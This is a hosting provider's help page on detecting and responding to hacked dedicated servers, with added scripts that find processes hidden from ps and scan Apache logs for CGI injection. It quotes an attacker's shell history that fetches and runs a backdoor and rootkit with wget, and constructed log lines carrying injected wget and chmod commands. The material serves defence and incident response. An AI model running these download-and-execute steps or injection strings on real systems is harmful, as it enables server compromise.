It does not only happen to others. How do you tell that a machine has been hacked? A look at the MRTG traffic graphs leaves little doubt:

[MRTG traffic graphs]

And on the machine itself, we find:

    root      3632  0.0  1.0  2368 1320 pts/0  S  10:51  0:00 -bash
    root      6310  0.0  0.1   476  248 pts/0  S  11:27  0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
    [...]
    root      6360  0.0  0.1   476  244 pts/0  S  11:27  0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400

The attacker was clearly able to run programs as root. The machine is therefore compromised and must be reinstalled.

    # netstat -tanpu
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address    Foreign Address  State  PID/Program name
    udp        0      0 0.0.0.0:9875     0.0.0.0:*               28823/xc
    udp        0      0 0.0.0.0:1052     0.0.0.0:*               28823/xc
    udp        0      0 0.0.0.0:6770     0.0.0.0:*               28823/xc
    # ps auxw | grep 28823
    root      7117  0.0  0.5  1796  748 pts/1  S  11:38  0:00 grep 28823

There are running processes that own sockets and have a PID (28823, program xc), yet ps does not show them. Almost certainly ps has been replaced by a trojaned copy that filters out the attacker's processes to fool the eye. Once system binaries have been replaced, nothing the machine reports about itself can be trusted.

    # halt
    Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...
    The system is going down for system halt NOW !!

We stop the machine immediately. With luck the compromise is only partial: see SemiHackedMachine. Another case: HackedMachineExample.

Why was the machine hacked? The causes are many, but they can be summed up in one sentence: you are not paranoid enough.

- You use telnet. Your login and password cross the Internet in clear text and can be stolen at any time. You must use SSH; see the guide SshOnDedicated.
- You use FTP. Your login and password cross the Internet in clear text, and it is the same password as root. SFTP is your solution.
- You use POP3/IMAP with a password, and it is the root password. Use APOP or POP3S/IMAPS; see the guide SmtpPop3Imap.
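The netstat/ps discrepancy above can be checked mechanically rather than by eye. The script below is an added example, not part of the original page: it parses netstat -tanpu and ps output and reports every socket owner that the process list does not show, then offers the same check live by comparing /proc against ps -e. The two listings embedded in it are constructed for this example, modelled on the output above; the sshd lines and the client address 10.0.0.5 are made up.

```sh
#!/bin/sh
# Added example (not from the original page): find processes that own sockets
# but are missing from ps, the symptom shown above with PID 28823 (xc).
# The two listings below are constructed for this example, modelled on the
# page's netstat -tanpu and ps auxw output; the sshd lines and 10.0.0.5 are made up.

NETSTAT_SAMPLE='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      412/sshd
tcp        0      0 213.186.34.196:22       10.0.0.5:51022          ESTABLISHED 3630/sshd
udp        0      0 0.0.0.0:9875            0.0.0.0:*                           28823/xc
udp        0      0 0.0.0.0:1052            0.0.0.0:*                           28823/xc
udp        0      0 0.0.0.0:6770            0.0.0.0:*                           28823/xc'

PS_SAMPLE='USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root       412  0.0  0.3  2736  920 ?        S    09:00   0:00 /usr/sbin/sshd
root      3630  0.0  0.4  2900 1200 ?        S    10:51   0:00 sshd: root@pts/0
root      3632  0.0  1.0  2368 1320 pts/0    S    10:51   0:00 -bash'

# hidden_socket_owners NETSTAT_TEXT PS_TEXT
# Prints "PID/program port,port,..." for each socket owner absent from the ps listing.
hidden_socket_owners() {
    {
        # ps: skip the header, keep the PID column, tag the line so awk can tell the inputs apart
        printf '%s\n' "$2" | awk 'NR > 1 { print "ps", $2 }'
        # netstat: keep lines whose last field is PID/Program; the local port follows the last ':'
        printf '%s\n' "$1" | awk '$NF ~ /^[0-9]+\// { n = split($4, a, ":"); print "net", $NF, a[n] }'
    } | awk '
        $1 == "ps"  { seen[$2] = 1; next }
        $1 == "net" {
            split($2, id, "/")
            if (id[1] in seen) next
            if ($2 in ports) ports[$2] = ports[$2] "," $3
            else ports[$2] = $3
        }
        END { for (k in ports) print k, ports[k] }'
}

# live_hidden_pids: run on the machine itself; lists /proc entries that ps -e does not report.
# Useful when only the ps binary was replaced. A kernel-level rootkit hides entries from
# /proc as well, so an empty result does not prove the machine is clean. A helper spawned
# by this pipeline can show up as a one-off false positive; rerun to confirm a hit.
live_hidden_pids() {
    [ -d /proc ] && command -v ps >/dev/null 2>&1 || return 0
    {
        ps -e -o pid= | awk '{ print "ps", $1 }'
        for d in /proc/[0-9]*; do echo "proc ${d#/proc/}"; done
    } | awk '$1 == "ps" { seen[$2] = 1; next } $1 == "proc" && !($2 in seen) { print $2 }'
}

echo "socket owners hidden from ps (sample data):"
hidden_socket_owners "$NETSTAT_SAMPLE" "$PS_SAMPLE"
```

On the sample data this prints `28823/xc 9875,1052,6770`, the same conclusion the page reaches by hand. Run from the compromised host, both checks should use statically linked binaries from read-only media, since the host's own awk, netstat and ps may be trojaned too; and whatever they report, a machine on which root was obtained still has to be reinstalled.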
If you do not keep your server up to date with the releases (ReleasePatch), you are an easy target: about 250 scans a day are carried out on our network looking for security flaws.

What to do?

If your server is hacked, it is placed in Rescue mode, which gives read-only FTP access only; you automatically receive your access code by e-mail. You can then submit an incident ticket asking for your machine to be placed in Rescue mode; in it you must explain your request and commit to fixing the problem before your server is reactivated. We check that the flaws have been fixed before the server is put back on the network in normal (HDD) mode.

Hack examples

1. CGI script fault

Symptoms

A g00dies.tgz file uploaded to /tmp together with other files: x, k, etc. The x program is a backdoor: once launched, it gives access to the server. We found the bash_history of the user nobody in /tmp. Here is its content:

    cd /tmp
    wget www.#######.com/x
    chmod +x x
    ./s
    ./x
    ./x
    ./x
    ./x./x
    ./x
    ./x
    ./x
    ./x
    wget www.#######.com/k
    chmod +x k
    ./k -d; /tmp/x
    ./x
    ./x
    ./x
    ./x
    ./x
    ./x
    ./
    cd /tmp
    mkdir .,
    cd .,
    wget ######.go.ro/vampix
    tar zxvf vampix
    cd esc
    ./mingetty
    ./mingetty
    ./mingetty
    cd /tmp
    wget ######.go.ro/g00dies.tgz
    tar zxvf g00dies.tgz
    cd goodies
    mv stealth /tmp
    cd /tmp
    wget ######.go.ro/smth
    chmod +x smth
    ./smth
    cd /tmp
    wget ######.go.ro/g00dies.tgz
    tar zxvf g00dies.tgz
    cd goodies
    mv stealth /tmp
    /tmp/smth
    /tmp/stealth

Comments

This shows that the commands were run as nobody, a user mainly used by Apache. The attacker most likely exploited a vulnerability in a CGI script.

Resolution

- Kill all suspect running processes. The attacker evidently did not obtain root (although a kernel flaw in versions earlier than 2.4.24 could have let him do so), but we nevertheless carry out some basic operations and checks:
- Consult the Apache logs from around the time of the hack to find the suspect script.
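One way to carry out the log step, as an added example that is not part of the original page: narrow the access log to the time window of the compromise, keep only requests to /cgi-bin/, and flag those carrying shell metacharacters (raw or URL-encoded) or tell-tale tokens such as wget and /tmp, which is exactly what the bash_history above shows being executed. The log lines embedded below are constructed in Apache combined format for this example; the client addresses, the script name counter.cgi and the host www.example.invalid are made up.

```sh
#!/bin/sh
# Added example (not from the original page): pick out the Apache requests around the
# time of the compromise that hit a CGI script with shell-injection indicators.
# The log lines below are constructed in Apache combined format for this example;
# the client addresses, the script name counter.cgi and www.example.invalid are made up.

ACCESS_LOG='213.186.34.1 - - [20/Nov/2003:10:58:12 +0100] "GET /index.html HTTP/1.1" 200 4512 "-" "Mozilla/4.0"
10.1.2.3 - - [20/Nov/2003:11:19:47 +0100] "GET /cgi-bin/counter.cgi?page=home HTTP/1.0" 200 118 "-" "Mozilla/4.0"
10.1.2.3 - - [20/Nov/2003:11:20:05 +0100] "GET /cgi-bin/counter.cgi?page=home%3Bcd%20/tmp%3Bwget%20www.example.invalid/x HTTP/1.0" 200 0 "-" "Mozilla/4.0"
10.1.2.3 - - [20/Nov/2003:11:20:31 +0100] "GET /cgi-bin/counter.cgi?page=|chmod%20+x%20x;./x| HTTP/1.0" 500 614 "-" "Mozilla/4.0"
213.186.34.2 - - [20/Nov/2003:11:35:00 +0100] "GET /cgi-bin/counter.cgi?page=about HTTP/1.0" 200 118 "-" "Mozilla/4.0"
10.1.2.3 - - [20/Nov/2003:12:02:10 +0100] "GET /cgi-bin/counter.cgi?page=%60id%60 HTTP/1.0" 200 41 "-" "Mozilla/4.0"'

# suspect_cgi_requests LOG_TEXT DAY FROM TO
# DAY as written in the log (20/Nov/2003); FROM and TO as HH:MM. Prints the log lines in
# that window whose request targets /cgi-bin/ and carries a shell metacharacter (raw or
# URL-encoded) or a tell-tale token such as wget or /tmp.
suspect_cgi_requests() {
    printf '%s\n' "$1" | awk -v day="$2" -v from="$3" -v to="$4" '
    {
        split(substr($4, 2), p, ":")        # $4 is "[20/Nov/2003:11:20:05" -> date, HH, MM, SS
        if (p[1] != day) next
        hm = p[2] ":" p[3]
        if (hm < from || hm > to) next      # zero-padded HH:MM compares correctly as strings
        if ($7 !~ /^\/cgi-bin\//) next      # $7 is the request path from "GET /path HTTP/1.x"
        if ($7 ~ /[;|`$&]|%3[bB]|%7[cC]|%60|%24|%26|%0[aA]|%0[dD]|wget|\/tmp/) print
    }'
}

# suspect_scripts LOG_TEXT DAY FROM TO
# Same filter, summarised as "count script" so the script to inspect stands out.
suspect_scripts() {
    suspect_cgi_requests "$@" | awk '{ split($7, q, "?"); n[q[1]]++ } END { for (s in n) print n[s], s }' | sort -rn
}

suspect_cgi_requests "$ACCESS_LOG" 20/Nov/2003 11:15 11:30
suspect_scripts "$ACCESS_LOG" 20/Nov/2003 11:15 11:30
```

The time window has to come from somewhere other than bash_history, which carries no timestamps: the modification times of the files the attacker dropped in /tmp (ls -l or stat on g00dies.tgz, x, k) give the moment of each wget. Check error_log for the same window as well, since a half-working injection tends to leave 500 errors behind, as in the constructed 11:20:31 line. Because the attacker in this case ran as nobody rather than root, the Apache logs are far more trustworthy than anything read from the rootkitted machine in the first example.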